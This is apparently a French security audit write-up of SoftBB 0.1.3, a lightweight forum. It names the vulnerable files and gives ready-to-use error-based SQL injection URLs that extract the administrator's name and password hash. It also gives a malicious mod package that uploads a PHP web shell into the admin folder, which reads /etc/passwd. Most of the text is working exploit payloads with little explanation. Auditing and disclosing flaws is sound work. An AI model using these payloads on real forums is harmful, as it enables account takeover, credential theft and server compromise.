Date : le dimanche 16 août 2010 de 20h à 01h00.
Application auditée : SoftBB 0.1.3 : http://www.softbb.net
Description : Il s'agit d'un forum très léger.
Pad : http://piratepad.net/dlkZwSHTPz
De nombreux défauts de sécurité ont été identifiés. Certains sont exploitables en tant que simple visiteur (enregistré ou non) du site et d'autres ne sont accessibles qu'à une personne ayant les droits d'administrateur.
http://localhost/softbb/index.php?page[]=reg
redir_last_post_list.php - ligne 12 et 16 addmembre.php - lignes 47 et 51 moveto.php - ligne 156 post.php, delgroupe.php, delpost.php, delforum.php
Solution retenue :
Le nom de l'administrateur
http://localhost/softbb/redir_last_post_list.php?post=1 AND (ExtractValue(1,CONCAT(0x5c,(SELECT(pseudo)FROM(softbb_membres)WHERE id=1))))
Les 31 premiers caractères du hash du mot de passe de l'administrateur
http://localhost/softbb/redir_last_post_list.php?post=1 AND (ExtractValue(1,CONCAT(0x5c,(SELECT(mdp)FROM(softbb_membres)WHERE id=1))))
Le 32ème caractère du hash du mot de passe de l'administrateur
http://localhost/softbb/redir_last_post_list.php?post=1 AND (ExtractValue(1,CONCAT(0x5c,(SELECT(SUBSTR(mdp,32,32))FROM(softbb_membres)WHERE id=1))))
#*#*#*#*#*# I N F O S #*#*#*#*#*#
#*#*# NOM du mod : exploit
#*#*# AUTEUR : Zenk-Security
#*#*# DESCRIPTION : Exploitation de la faille d'upload
#*#*# DEPENDANCE1 :
#*#*# DEPENDANCE2 :
#*#*# VERSION : 1
#*#*#*#*#*# E X E C U T I O N #*#*#*#*#*#
#*#*# DEBUT ETAPE 1 #*#*#
##=> AJOUTER FICHIER:
<?php system("cat /etc/passwd"); ?>
##=> NOM:
admin/exploit.php
#*#*# FIN ETAPE 1 #*#*#